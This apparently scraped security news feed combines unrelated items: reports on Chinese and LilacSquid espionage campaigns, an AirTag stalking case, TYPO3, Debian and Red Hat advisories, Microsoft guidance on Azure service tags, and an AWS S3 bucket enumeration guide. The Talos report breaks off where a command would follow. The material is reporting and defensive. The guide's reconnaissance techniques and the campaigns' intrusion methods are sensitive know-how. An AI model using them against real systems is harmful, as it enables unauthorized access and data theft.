Sophos uncovers “Operation Crimson Palace, a long-term cyberespionage effort targeting a Southeast Asian government. Learn how attackers used…

Sophos uncovers “Operation Crimson Palace, a long-term cyberespionage effort targeting a Southeast Asian government. Learn how attackers used DLL sideloading and VMware exploits to steal sensitive military, economic, and South China Sea data. Discover how Southeast Asia can defend against future cyberattacks.

Cybersecurity firm Sophos has shared details of a large-scale espionage campaign dubbed “Crimson Palace.” This Chinese state-sponsored effort targeted a government agency in Southeast Asia for nearly two years, through tactics like DLL sideloading and VMware exploitation.

As per Sophos MDR’s human-led threat-hunting service, multiple Chinese state-sponsored actors have been active since early 2022, and despite a few weeks of dormancy, intrusion activity continues targeting the organization, which Sophos categorizes as “mixed estate.”

Sophos initially discovered activity in March 2022 with the detection of NUPAKAGE malware, attributed to Earth Preta and again in December 2022, intrusion activity was discovered using DLL-stitching to deploy malicious backdoors on domain controllers.

During the investigation, Sophos researchers found three distinct clusters of activity named Cluster Alpha, Cluster Bravo, and Cluster Charlie, targeting the same organization. These clusters overlap with multiple Chinese nation-state groups, including Worok, the APT41 subgroup Earth Longzhi, BackdoorDiplomacy, REF5961, TA428 and a relatively new threat group, Unfading Sea Haze that was reported in May 2024 to be carrying out extensive cyberattacks against military targets in the South China Sea.

Cluster Alpha focused on sideloading malware and establishing persistent C2 channels, while Cluster Bravo focused on using valid accounts to spread laterally. Cluster Charlie prioritized access management and aimed to exfiltrate sensitive information for espionage purposes.

These clusters used a mix of custom malware and publicly available tools to gather sensitive political, economic, and military information. These include CCoreDoor, PocoProxy, an updated variant of Cobalt Strike, PowHeartBeat backdoor, EAGERBEE malware, NUPAKAGE, Merlin C2 Agent, PhantomNet backdoor, RUDEBIRD malware, and an LSASS logon credential interceptor.

> _“Sophos MDR has observed the actors attempting to collect documents with file names that indicate they are of intelligence value, including military documents related to strategies in the South China Sea.”_
> 
> Sophos

Sophos believes the campaign’s primary aim is to maintain cyberespionage access for safeguarding Chinese state interests, including accessing critical IT systems, performing reconnaissance, collecting sensitive information, and deploying malware implants for command-and-control communications.

The campaign as per Sophos’ blog post, also included over 15 distinct DLL sideloading scenarios, most of which abused Windows Services, legitimate Microsoft binaries, and AV vendor software.

****Threat Actors Collaborating Worldwide****

This marks the first instance where Chinese threat groups are actively collaborating to target an entity, each with its own working hours and scheduling activities, directed by a central authority.

Last month, cybersecurity researchers at Check Point reported that several Iranian state-sponsored hacker groups are teaming up for large-scale attacks. Similarly, a report from Flashpoint last month highlighted that Russian state-sponsored hacker groups are changing tactics. They are now partnering up and increasingly relying on malicious paid tools instead of the custom-made tools they previously used.

1.  China-Linked Spyware Found in Play Store Apps, 2m Downloads
2.  China’s insidious surveillance against Uyghurs with Android malware
3.  Muddling Meerkat Suspected of Espionage via Great Firewall of China
4.  Chinese Blackwood APT Deploys NSPX30 Backdoor in Cyberespionage
5.  Cyberattacks Surge 325% in Philippines Amid South China Sea Standoff

Crimson Palace: Chinese Hackers Steal Military Secrets Over 2 Years

A husband, now indicted, allegedly used seven Apple AirTags to stalk his ex-wife over a period of several weeks. His trial begins this month.

Following their divorce, a husband carried out a campaign of stalking and abuse against his ex-wife—referred to only as “S.K.”—by allegedly hiding seven separate Apple AirTags on or near her car, according to documents filed by US prosecutors for the Eastern District of Pennsylvania.

The documents, unearthed by 404 Media in collaboration with Court Watch, reveal how everyday consumer tools, like Bluetooth trackers, are sometimes leveraged for abuse against spouses and romantic partners.

 “The Defendant continued to adapt and use increasingly sophisticated efforts to hide the AirTags he placed on S.K.’s car,” US attorneys said. “It is clear from the timing of the placement of the AirTags and corroborating cell-site data, that he was monitoring S.K.’s movements.”

On May 8, the US government filed an indictment against the defendant, Ibodullo Muhiddinov Numanovich, with one alleged count of stalking against his ex-wife, S.K.

The stalking at the center of the government’s indictment allegedly began around March 27, when the FBI first learned about S.K. finding and removing an AirTag from her car. Less than a month later, on April 18, the FBI found a second AirTag that “was taped underneath the front bumper of S.K.’s vehicle with white duct tape.”

The very next day, the FBI found a third AirTag. This time, it was “wrapped in a blue medical mask and secured under the vehicle near the rear passenger side wheel well.”

This pattern of finding an AirTag, removing it, and then finding another was punctuated by physical and verbal intimidation, the government wrote. After a fourth AirTag was removed, the government said that Numanovich called S.K., followed her to a car wash, and “banged on her windows, and demanded to know why S.K. was not answering his calls.” Less than one week later, during a period of just 10 minutes, the government said that Numanovich left five threatening voice mails on S.K.’s phone, calling her “disgusting” and “worse than an animal.”

During the investigation, the FBI retrieved seven AirTags in total. Here is where those AirTags were found:

1.  Found by S.K. with no detail on specific location
2.  Duct-taped underneath the front bumper of S.K.’s car
3.  Underneath S.K.’s car, near the passenger-side wheel well, wrapped in a blue medical mask
4.  Within the frame of SK’s driver-side mirror, wedged between the mirror itself and the casing around it
5.  “An opening within the vehicle’s frame” which, documents say, was previously sealed by a rubber plug that was removed
6.  Underneath the license plate on S.K.’s car
7.  Undisclosed

For two of the retrieved AirTags, the FBI deactivated the trackers and then, away from S.K., placed the AirTags at separate locations. At an undisclosed location in Philadelphia where the FBI placed one AirTag, FBI agents later saw Numanovich “exit his vehicle with his phone in his hand, and begin searching for the AirTag.” At a convenience store where the FBI placed a second AirTag, agents said they again saw Numanovich.

The FBI also received information about attempted pairings and successful unpairings with Numanovich’s Apple account for three of the Apple AirTags.

In addition to the alleged pattern of stalking, the government also accused Numanovich of abusing SK both physically and emotionally, threatening her in person and over the phone, and recording sexually explicit videos of her to use as extortion. After a search warrant was authorized on May 13, agents found “approximately 140 sexually explicit photographs and videos of S.K.” stored on Numanovich’s phone, along with records for “numerous” financial accounts that transferred more than $4 million between 2022 and 2023.

In a follow-on request from the government to detain Numanovich before his trial begins, prosecutors also revealed that S.K. may have been brought into the US through a “Russian-based human smuggling network”—a network of which Numanovich might be a member.

According to 404 Media, a jury trial for Numanovich is scheduled to start on June 8.

**Improving AirTag safety**

Just last month, Apple and Google announced an industry specification for Bluetooth tracking devices such as AirTags to help alert users to unwanted tracking. The specification will make it possible to alert users across both iOS and Android if a device is unknowingly being used to track them. We applaud this development.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Husband stalked ex-wife with seven AirTags, indictment says 

Backend API configuration using Page TSconfig is vulnerable to arbitrary code execution and cross-site scripting. TSconfig fields of page properties in backend forms can be used to inject malicious sequences. Field tsconfig_includes is vulnerable to directory traversal leading to same scenarios as having direct access to TSconfig settings.

A valid backend user account having access to modify values for fields pages.TSconfig and pages.tsconfig_includes is needed in order to exploit this vulnerability.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-hww5-6x85-mc24

**Typo3 Arbitrary Code Execution and Cross-Site Scripting in Backend API**

Moderate severity GitHub Reviewed Published Jun 5, 2024 to the GitHub Advisory Database • Updated Jun 5, 2024

**Package**

**Affected versions**

\>= 8.0.0, < 8.7.27

\>= 9.0.0, < 9.5.8

**Patched versions**

8.7.27

9.5.8

Published to the GitHub Advisory Database

Jun 5, 2024

GHSA-hww5-6x85-mc24: Typo3 Arbitrary Code Execution and Cross-Site Scripting in Backend API

Announcing the latest version of Malwarebytes, which brings a faster, responsive, and consistent user interface, integrated security and privacy, and expert guidance to keep you secure.

Announcing the latest version of Malwarebytes, which brings a faster, responsive, and consistent user interface, integrated security and privacy, and expert guidance to keep you secure.

Here’s what you can expect:

****1\. Unified user experience across platforms** **

The new generation of Malwarebytes now delivers a consistent user experience across all our desktop and mobile platforms. The reimagined user interface is faster, more responsive, and managed through an intuitive dashboard, giving you a streamlined experience wherever you use Malwarebytes. 

**Why?** Sophisticated hacking tactics and various entry points mean you can’t afford to have blind spots in your protection. A seamless experience across all platforms and devices means you don’t have to figure out more than once about what to do next. We’ve also made it easier to find everything, encouraging you to keep your guard up on all your devices. 

****2\. Premium Security and Privacy VPN integration** **

We’ve merged our award-winning Premium Security and ultra fast no-log Privacy VPN into a single dashboard, making it much easier for you to take control of your privacy. With just one click, you can now protect your Wi-Fi or hotspot connections and change your location to visit the site you want at the speed you need. Don’t forget to also use Browser Guard on your desktop to block ad trackers and scam sites from your browser.  

**Why?** We know that the distinction between security and privacy is not clear-cut, and you need both products to work together to minimize your exposure (risk of threats and lack of privacy). Integrating the two makes it much easier to protect both your devices and data (at home and on the go), with an easy set-and-forget experience that doesn’t require adding another program.  You shouldn’t have to guess whether the next attack will compromise your Wi-Fi connection, browser, or files through phishing emails, spyware, or malware. Let the technology do this for you.  

****3\. Trusted Advisor, your security coach**  **

On the Malwarebytes dashboard, Trusted Advisor provides unbiased expert guidance at your fingertips. Your easy-to-understand individual Protection Score enables you to act on any potential security gaps, unlocking the full power of technology.

**Why?** In our recent report, “Everyone’s afraid of the internet, and no one’s sure what to do about it,” we found that only half of the people surveyed felt confident they knew how to stay safe online, and even fewer said they were taking the right measures to protect themselves. Trusted Advisor empowers you with real-time insights, an easy-to-read protection score, and expert guidance that puts you in control of your security and privacy.  We’re by your side guiding you through what to do next to fill your security gaps for each device and platform (Windows, Mac, Android, and iOS).

**Want to try?** You can! With our 14-day free trial.  

Already a customer but not yet seeing it? Log into MyAccount or download the latest build for Windows | Mac | iOS | Android.  

**Software Requirements:** 

*   Windows 7 (or higher) 
*   macOS 11 BigSur (or higher)
*   iOS 16 (or higher) 
*   Android 9 (or higher)

 Say hello to the fifth generation of Malwarebytes 

Summary Microsoft Security Response Center (MSRC) was notified in January 2024 by our industry partner, Tenable Inc., about the potential for cross-tenant access to web resources using the service tags feature. Microsoft acknowledged that Tenable provided a valuable contribution to the Azure community by highlighting that it can be easily misunderstood how to use service tags and their intended purpose.

**Summary**

Microsoft Security Response Center (MSRC) was notified in January 2024 by our industry partner, Tenable Inc., about the potential for cross-tenant access to web resources using the service tags feature. Microsoft acknowledged that Tenable provided a valuable contribution to the Azure community by highlighting that it can be easily misunderstood how to use service tags and their intended purpose. Although Microsoft initially confirmed the vulnerability and paid Tenable a bounty for their contributions, further investigation into Tenable’s report determined that service tags work as designed and best practices needed to be clearly communicated through service documentation as we had communicated in our follow-up correspondence with Tenable.

Cross-tenant access is prevented by authentication and only represents an issue where authentication is not used. However, this case does highlight an inherent risk in using service tags as a single mechanism for vetting incoming network traffic. **Service tags are not to be treated as a security boundary and should only be used as a routing mechanism in conjunction with validation controls.** No exploitation or abuse of service tags has been reported by a third-party or seen in the wild per our own investigation.

As always, we strongly encourage customers to use multiple layers of security for their resources, such as monitoring network traffic and authentication. As a result of Tenable’s report, we’ve updated our documentation to remind customers of the function of service tags.

The goal of this update to service tags documentation is to improve our customers’ understanding of service tags and how they function. As such, there is no mandatory action required by customers and no additional messaging provided in the Azure Portal. However, Microsoft strongly recommends that customers proactively review their use of service tags and validate their security measures to authenticate only trusted network traffic for service tags.

**Technical Details**

Service tags are a convenient way to represent a block of IP space for many Azure services. Resources can use service tags to reference Azure services in their firewall rules, for example to allow traffic from a given service to access the resource.

Some of these services allow inbound traffic via a service tag and contain features that give users control over parts of a web request (i.e., URL path, destination host, etc.). Potentially, an attacker in Tenant A can use these web requests to access web resources in Tenant B if it has been configured to allow traffic from the service tag and does not otherwise provide any form of authentication.

In these cases, impact is determined in part by the following factors:

*   Whether the victim service performs an auth check of its own
*   How much of the request body can be controlled by the attacker
*   Whether the response content can be viewed by the attacker

**Example: Azure Monitor Availability Tests**

For example, Azure Monitor Availability Tests service has an ApplicationInsightsAvailability service tag that enables users to configure webtests through a firewall to access their service endpoint(s) and perform synthetics monitoring. Because these webtests use the same public IP addresses in a shared infrastructure to call a user’s service endpoint(s), a user could configure a web request to access a service endpoint from another Azure Monitor Availability Tests subscription. This behavior could enable a malicious actor to send web requests to another user’s service endpoint(s) and the application may process the unintended web request, if:

1.  the malicious actor had access to a tenant that enabled the ApplicationInsightsAvailability service tag and
2.  the target service endpoint does not perform any of its own authentication checks.

**Customer Guidance  **

Service tags represent a range of IP addresses for a given Azure service and are used for network configuration such as firewall filtering, network security groups (NSGs), and user-defined routes (UDRs). This functionality of the service tags is crucial to allow network traffic between the Azure service and a user’s service endpoint(s). Given the flexible use cases for service tags, customers must consider their network traffic between tenants and their specific scenarios for a service.

**Service tags are not a comprehensive way to secure traffic to a customer’s origin and do not replace input validation to prevent vulnerabilities that may be associated with web requests.** Input validation is used to assure where the traffic originates and who is sending the traffic. Additional authentication and authorization checks must be implemented for a layered network security approach.

Azure customers are highly encouraged to review their use of Microsoft virtual network service tags and evaluate if additional measures must be put in place to secure network traffic between Azure tenants. After a customer has reviewed service tag(s) usage, they can:

*   Review the new best practices article for Microsoft service tags and follow specific guidance if provided by a service.
*   Review Azure security fundamentals documentation to ensure that their Azure platform and infrastructure are set up with general and security best practices in mind.
*   Review Azure Monitor documentation to ensure that their Azure platform and infrastructure has appropriate monitoring controls enabled to collect, analyze, and respond to system events.

**Example: Azure Monitor Availability Tests with Authentication Check  **

Azure Monitor Availability Tests provide a customer with an opportunity to monitor the uptime of their resources. Customers must consider this in their resource monitoring strategy. Using Azure Monitor Availability Tests along with the associated service tag ensures adherence to a standard monitoring strategy.

To prevent the ApplicationInsightsAvailability service tag from passing unwanted network traffic to your service endpoint(s), create a token and add it as a HTTP header in your availability test. Your service can then validate the HTTP header in incoming requests to authenticate that the origin of traffic is from your availability tests. Thus, all other requests without the custom HTTP header would be rejected and dropped. Learn more about this application layer security control for Azure Monitor Availability Tests here.

In addition to the above, some customers may have the following scenario. Company A may provide an API to several industry partners so they can use it in their services or applications. Each of these partners may want to monitor the uptime of Company A’s APIs through Azure Monitor Availability Tests. Thus, Company A will have to decide on their resource monitoring strategy for their APIs and how to communicate that strategy to their industry partners.

In the pursuit of secure-by-design principles, Company A could implement a validation check for their HTTP headers. Company A’s resource monitoring strategy would only be accessible to industry partners with a custom header, ensuring secure collaboration. Alternately, Company A could decide not to require a custom header and instead use their own method of authentication, enabling anyone to monitor their APIs through Azure Monitor Availability Tests.

**Microsoft’s Response and Timeline of Events**

Microsoft took the following actions after this activity was brought to its attention:

*   Microsoft performed a comprehensive variant hunt, telemetry investigation, and engineering review of this issue which influenced the mitigation strategy
*   Azure services with inbound service tags updated documentation to include information about their service tag(s) use cases and/or guidance to confirm network traffic
*   Azure documented best practices for service tags in a general article

We have provided the timeline of key events associated with this issue as well as highlight our approach to increase available service documentation to customers to prevent this issue:

*   **24 January 2024:** Tenable submits a potential security vulnerability though the MSRC researcher portal.
*   **31 January 2024**: MSRC confirms the observed vulnerability and awards a bounty to Tenable.
*   **2 February 2024**: Microsoft reviews the issue and started to perform a comprehensive variant hunt, telemetry investigation, and engineering review of this behavior to determine a mitigation strategy.
*   **26 February 2024**: Microsoft communicates our customer disclosure strategy and commitment to enhancing Azure services’ service tag documentation to address the issue.
*   **6 March 2024**: Microsoft and Tenable agree to a coordinated disclosure for this issue.
*   **31 March 2024**: Microsoft concludes our comprehensive variant hunt, telemetry investigation, and engineering review for this issue.
*   **3 April 2024**: Microsoft expresses in written feedback to Tenable that this issue is not a SSRF vulnerability.
*   **3 May 2024**: Microsoft expresses in written feedback to Tenable that this issue is not a firewall bypass vulnerability.
*   **10 May 2024**: Microsoft made the service tags documentation changes publicly available on Microsoft Learn.
*   **3 June 2024**: Microsoft and Tenable disclose this issue to the public.

**Acknowledgement**

We appreciate the opportunity to investigate the findings reported by Tenable and thank them for practicing safe security research under the terms of the Microsoft Bug Bounty Program. We encourage all researchers to work with vendors under Coordinated Vulnerability Disclosure (CVD) and abide by the rules of engagement for penetration testing to avoid impacting customer data while conducting security research.

Microsoft has a long history of working with third-party researchers and others across the security community. This is reflected in our Secure Future Initiative (SFI), further promoting transparency in how we work with security researchers and respond to claims of risk associated with our products and platforms services. Microsoft is committed to sharing our analysis of researchers’ claims and providing recommendations to customers and the community.

**References**

*   Questions? Open a support case through the Azure Portal at aka.ms/azsupt
*   Learn more about Azure Virtual Network Service Tags at Azure service tags overview | Microsoft Learn
*   Learn more about Azure security fundamentals at Azure security fundamentals documentation | Microsoft Learn
*   Learn more about Azure Monitor at Azure Monitor documentation - Azure Monitor | Microsoft Learn

Improved Guidance for Azure Network Service Tags

By Daily Contributors
Amazon Web Services (AWS) Simple Storage Service (S3) is a foundational pillar of cloud storage, offering scalable object…
This is a post from HackRead.com Read the original post: In the jungle of AWS S3 Enumeration

Amazon Web Services (AWS) Simple Storage Service (S3) is a foundational pillar of cloud storage, offering scalable object storage for millions of applications. However, misconfigured S3 buckets can be a gateway to sensitive data exposure.

In this guide, we will delve into advanced methods for S3 bucket reconnaissance — essential for cloud pentesters and cloud security experts to identify and secure vulnerable buckets before they’re exploited.

****The Current Situation****

In the cloud monitoring service Datadog’s article on the state of security in AWS, they analyzed trends in the implementation of security best practices and took a closer look at various types of…

Credit: DatadogHQ

**36% of organizations with at least one Amazon S3 bucket have it configured to be publicly readable**. This is a significant cybersecurity risk, as publicly accessible S3 buckets can expose sensitive data to unauthorized individuals, leading to potential data breaches, data theft, and a host of compliance issues.

We could model the attack from a high-level point of view as follows:

Classical S3 Attack Path Scenario

In this article, we will focus on the recognition techniques used by attackers in part 1 of the figure above.

****Google Dorking to Locate Buckets****

Google Dorking utilizes advanced search queries to find hidden information on the internet. When it comes to S3 buckets, specific dorks can reveal buckets left exposed by inadvertent configurations.

Example Commands:

First command result example:

Search results will list web pages or direct links to S3 buckets. Verify the legitimacy of each link, as some may be outdated or reference non-existent buckets. For actual buckets, proceed to check the permissions and contents, ideally reporting any misconfigurations to the bucket owner.

****Burp Suite Exploration****

Burp Suite is a powerful tool for web application security pentesting. It can be used for S3 bucket reconnaissance by monitoring HTTP requests that contain bucket information.

Configure your browser to use Burp Suite as its proxy, then browse the target application. Burp Suite will automatically capture the traffic. Analyze the sitemap generated by Burp for any S3 bucket links or headers.

Look for patterns such as:

*   URLs containing “s3.amazonaws.com”
*   Headers with “x-am-bucket”

For instance:

Burp s3 keyword search through the proxy history

Also, the Burp plugin AWS Security Checks from the BApp Store can be really useful. The traffic analysis capabilities of Burp Suite allow for detailed scrutiny of web applications and potential S3 bucket discovery inside indirect or sub calls.

****GitHub Recon Tools****

There’s a treasure trove of S3 reconnaissance tools on GitHub. These tools range in functionality from scanning bucket names to checking for public accessibility and dumping contents.

S3Scanner: https://github.com/sa7mon/S3Scanner

Dumpster Diver: https://github.com/securing/DumpsterDiver

S3 Bucket Finder: https://github.com/gwen001/s3-buckets-finder

AWSInventorySync: https://github.com/foreseon/AWSInventorySync

Leveraging automated tools can vastly increase the efficiency and breadth of your reconnaissance. After running these tools, the next steps should involve assessing the identified buckets’ configurations, understanding the potential risks, and, if necessary, alerting the responsible parties.

****Online Websites****

Online resources can streamline the S3 bucket discovery process. Nuclei templates, specifically, are predefined patterns used to detect common vulnerabilities, including misconfigured S3 buckets.

For instance you can use:

*   Osint.sh/buckets
*   Buckets.grayhatwarfare

Tools like OSINT.sh and GrayHatWarfare are tailor-made to simplify the search process, pulling from pools of data that might take an individual researcher considerable time to amass.

What’s more, the existence of SaaS services accessible with just three clicks shows just how widespread this attack is these days. Hackers have even developed automated programs for scanning and collecting objects publicly exposed in S3 buckets.

****Regex Mastery****

Mastering simple regex can be one of the most efficient ways to conduct S3 bucket reconnaissance. By chaining simple commands, you can create powerful searches.

****Running Commands****

Here’s how to use regex with curl to extract S3 bucket URLs from JavaScript files:

And for using subfinder and httpx:

The command-line outputs will typically provide you with raw URLs or status codes. A 200 status code on an S3 bucket URL, for example, indicates that the bucket is accessible.

Further exploration of these command-line techniques offers granular control over the reconnaissance process and can be customized for specific scenarios. The output from these commands must be carefully analyzed to distinguish between normal bucket usage and potential security risks.

****Conclusion****

Navigating the complexities of AWS S3 Enumeration is crucial for identifying and securing misconfigured S3 buckets, which are potential gateways to sensitive data exposure.

Identifying these vulnerabilities is only the first step. Action must be taken to mitigate these risks, ensuring data remains secure against potential breaches. This is where Resonance Security steps in.

> Specializing in cloud security audits and penetration testing, we provide the expertise needed to protect and reinforce cloud environments against threats.
> 
> Resonance Security

For companies looking to enhance their cloud security posture, we offer tailored pentests & audits designed to meet the unique challenges of securing your cloud infrastructure. Learn more about how we can support your cloud security needs at Resonance Security.

In sum, the path to secure AWS S3 storage is multifaceted, demanding a proactive approach to security. With the right techniques and expert support, companies can navigate this landscape confidently, protecting their most valuable digital assets.

1.  Leaky database exposes fake Amazon product reviews scam
2.  9,517 unsecured databases identified with 10 billion records globally
3.  US and China Exposed Most DBs Among 308,000 Discovered in 2021
4.  Lesson from Casio’s Data Breach: Database Security is a Major Challenge
5.  Misconfigured ElasticSearch Servers Leaked 579GB of Users’ Site Activity

**As a Lead Security Engineer at Resonance Security, I play a pivotal role in shaping our cybersecurity landscape.**

In the jungle of AWS S3 Enumeration

Backend API configuration using Page TSconfig is vulnerable to arbitrary code execution and cross-site scripting. TSconfig fields of page properties in backend forms can be used to inject malicious sequences. Field tsconfig_includes is vulnerable to directory traversal leading to same scenarios as having direct access to TSconfig settings.

A valid backend user account having access to modify values for fields `pages.TSconfig` and `pages.tsconfig_includes` is needed in order to exploit this vulnerability.



Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-x428-565f-8xj2

**TYPO3 Arbitrary Code Execution and Cross-Site Scripting in Backend API**

High severity GitHub Reviewed Published May 30, 2024 to the GitHub Advisory Database • Updated May 30, 2024

**Package**

composer typo3/cms-core (Composer)

**Affected versions**

\>= 8.0.0, < 8.7.27

\>= 9.0.0, < 9.5.8

**Patched versions**

8.7.27

9.5.8

**Description**

Published to the GitHub Advisory Database

May 30, 2024

Last updated

May 30, 2024

GHSA-x428-565f-8xj2: TYPO3 Arbitrary Code Execution and Cross-Site Scripting in Backend API

Debian Linux Security Advisory 5700-1 - An SQL injection was discovered in pymysql, a pure Python MySQL driver.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5700-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 29, 2024                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : python-pymysqlCVE ID         : CVE-2024-36039An SQL injection was discovered in pymysql, a pure Python MySQL driver.For the oldstable distribution (bullseye), this problem has been fixedin version 0.9.3-2+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.0.2-2+deb12u1.We recommend that you upgrade your python-pymysql packages.For the detailed security status of python-pymysql please refer toits security tracker page at:https://security-tracker.debian.org/tracker/python-pymysqlFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZXZeAACgkQEMKTtsN8TjY9cRAAkMErPcbiz3MnN7NmUuqkG/NmbuUM9smN4WZp8sF6kCsCm9G8M/dSioS+IpZMFUv1DDELh2HtxWjvA+fqMTddY3CxINKmJEiMKPd8I02CjJsq1gArH8VVAaxNFQRyU69RA1hecMcQvR1lEssciddFfkzpe6E1SXK/Mp2JMNWmtpRJNUZ9khhIf4PrthpForQN8EzQs8gJRQ/2rN48TgcAA/bGyS+W5PGJbb+1RjW5H4eaNo1HHgZNwJNcTjkylG9MV7nzC5ThCPb7ycrIadYPV/IAYqnh5qUHQnDDROFvWE1MDdn9cPxGYoDmFk+/Sgxe9HXRE+Dr8/h0vb0tBBSqN6nBG/OBHKT3eKsDJVPt8TWkBuagsCvNFY3a7Unu9NQC6NavUanspOacnY1W65BYHUq/5e/U0cLyZgJcPzaJSKeZHVsHLHLStqbKUCWVBpDxX+5eVd8v3hxGq32H3e71MKqoLV5FzWUzf77qe8SxhWJ+7YSUdYVpVjZXtronaUvPKTub8p2d32dAZOSQYTbeehQpb1pIoVBWNxAOi12xTz8y7qta/DspjF4Tj3ks+9EiKtS7Bzf+jEQmYEI04RxRn/wdHRFhYjwaGsvhlaH221Y/w53fczJ5bj2zQODBJShGhuNmwpz9Jr7fvI+gZE3smVkMLWaJPl2BhtF2kAFB62s==sLat-----END PGP SIGNATURE-----

Debian Security Advisory 5700-1

Red Hat Security Advisory 2024-3473-03 - Red Hat OpenShift Virtualization release 4.14.6 is now available with updates to packages and images that fix several bugs and add enhancements.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3473.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: OpenShift Virtualization 4.14.6 Images security updateAdvisory ID:        RHSA-2024:3473-03Product:            OpenShift VirtualizationAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3473Issue date:         2024-05-30Revision:           03CVE Names:          CVE-2023-45857====================================================================Summary: Red Hat OpenShift Virtualization release 4.14.6 is now available with updates to packages and images that fix several bugs and add enhancements.Red Hat Product Security has rated this update as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE link(s) in the References section.Description:OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.This advisory contains OpenShift Virtualization 4.14.6 images.Security Fix(es):* axios: exposure of confidential data stored in cookies (CVE-2023-45857)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45857References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/security/cve/CVE-2023-45857https://bugzilla.redhat.com/show_bug.cgi?id=2248979https://issues.redhat.com/browse/CNV-36026https://issues.redhat.com/browse/CNV-39569

Red Hat Security Advisory 2024-3473-03

Multiple TTPs utilized in this campaign bear some overlap with North Korean APT groups.

Thursday, May 30, 2024 08:01

_By Anna Bennett, Nicole Hoffman, Asheer Malhotra, Sean Taylor and Brandon White._ 

*   Cisco Talos is disclosing a new suspected data theft campaign, active since at least 2021, we attribute to an advanced persistent threat actor (APT) we’re calling “LilacSquid.”  
*   LilacSquid’s victimology includes a diverse set of victims consisting of information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources.  
*   This campaign uses MeshAgent, an open-source remote management tool, and a customized version of QuasarRAT we’re calling “PurpleInk” to serve as the primary implants after successfully compromising vulnerable application servers exposed to the internet.  
*   This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.”  
*   The campaign is geared toward establishing long-term access to compromised victim organizations to enable LilacSquid to siphon data of interest to attacker-controlled servers. 

**LilacSquid – An espionage-motivated threat actor **

Talos assesses with high confidence that this campaign has been active since at least 2021 and the successful compromise and post-compromise activities are geared toward establishing long-term access for data theft by an advanced persistent threat (APT) actor we are tracking as "LilacSquid" and UAT-4820. Talos has observed at least three successful compromises spanning entities in Asia, Europe and the United States consisting of industry verticals such as pharmaceuticals, oil and gas, and technology. 

Previous intrusions into software manufacturers, such as the 3CX and X\_Trader compromises by Lazarus, indicate that unauthorized long-term access to organizations that manufacture and distribute popular software for enterprise and industrial organizations can open avenues of supply chain compromise proving advantageous to threat actors such as LilacSquid, allowing them to widen their net of targets.  

We have observed two different types of initial access techniques deployed by LilacSquid, including exploiting vulnerabilities and the use of compromised remote desktop protocol (RDP) credentials. Post-exploitation activity in this campaign consists of the deployment of MeshAgent, an open-source remote management and desktop session application, and a heavily customized version of QuasarRAT that we track as “PurpleInk” allowing LilacSquid to gain complete control over the infected systems. Additional means of persistence used by LilacSquid include the use of open-source tools such as Secure Socket Funneling (SSF), which is a tool for proxying and tunneling multiple sockets through a single secure TLS tunnel to a remote computer. 

It is worth noting that multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus. Public reporting has noted Andariel’s use of MeshAgent as a tool for maintaining post-compromise access after successful exploitation. Furthermore, Talos has observed Lazarus extensively use SOCKs proxy and tunneling tools, along with custom-made malware as part of their post-compromise playbooks to act as channels of secondary access and exfiltration. This tactic has also been seen in this campaign operated by LilacSquid where the threat actor deployed SSF along with other malware to create tunnels to their remote servers. 

**LilacSquid’s infection chains **

There are primarily two types of infection chains that LilacSquid uses in this campaign. The first involves the successful exploitation of a vulnerable web application, while the other is the use of compromised RDP credentials. Successful compromise of a system leads to LilacSquid deploying multiple vehicles of access onto compromised hosts, including dual-use tools such as MeshAgent, Secure Socket Funneling (SSF), InkLoader and PurpleInk. 

Successful exploitation of the vulnerable application results in the attackers deploying a script that will set up working directories for the malware and then download and execute MeshAgent from a remote server. On execution, MeshAgent will connect to its C2, carry out preliminary reconnaissance and begin downloading and activating other implants on the system, such as SSF and PurpleInk. 

MeshAgent is typically downloaded by the attackers using the bitsadmin utility and then executed to establish contact with the C2: 

